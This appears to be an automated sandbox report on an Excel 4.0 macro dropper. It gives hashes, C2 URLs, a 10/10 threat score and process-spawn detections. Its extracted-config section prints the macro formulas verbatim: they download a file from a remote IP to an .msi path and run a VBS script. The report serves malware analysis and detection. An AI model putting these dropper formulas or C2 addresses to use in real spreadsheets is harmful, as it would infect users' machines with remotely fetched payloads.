General

  • Target

    97a60be3dee6ac2aaab0aa24ada9490b

  • Size

    6KB

  • Sample

    231222-qbs2sadfbk

  • MD5

    97a60be3dee6ac2aaab0aa24ada9490b

  • SHA1

    6094231dea0e463c0301e425b9a337c6240d2474

  • SHA256

    6dd6c9edb655b3001a9381a76ebebd680427e6f09be0c237a94ccf365c83918d

  • SHA512

    9f43ce54d26ee817c99e62aae4c44eee0a501c827aeaba11acb9af71880ac8dc77ef4c4c4d0f20f885dc52d06711734dd97dd94fface51e0b47dcd459b0b91f2

  • SSDEEP

    192:NDSJluSxbrA2OmmfRo8UhHFBFYuGb98ysSwF+c:N8uOM2w+1FYzb98y/w1

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://46.17.98.187/index.php

http://google.com/index.php

Attributes
  • formulas

    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://46.17.98.187/index.php

xlm40.dropper

http://google.com/index.php

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://46.17.98.187/index.php

Targets

    • Target

      97a60be3dee6ac2aaab0aa24ada9490b

    • Size

      6KB

    • MD5

      97a60be3dee6ac2aaab0aa24ada9490b

    • SHA1

      6094231dea0e463c0301e425b9a337c6240d2474

    • SHA256

      6dd6c9edb655b3001a9381a76ebebd680427e6f09be0c237a94ccf365c83918d

    • SHA512

      9f43ce54d26ee817c99e62aae4c44eee0a501c827aeaba11acb9af71880ac8dc77ef4c4c4d0f20f885dc52d06711734dd97dd94fface51e0b47dcd459b0b91f2

    • SSDEEP

      192:NDSJluSxbrA2OmmfRo8UhHFBFYuGb98ysSwF+c:N8uOM2w+1FYzb98y/w1

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Process spawned suspicious child process

      This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.

MITRE ATT&CK Enterprise v15

Tasks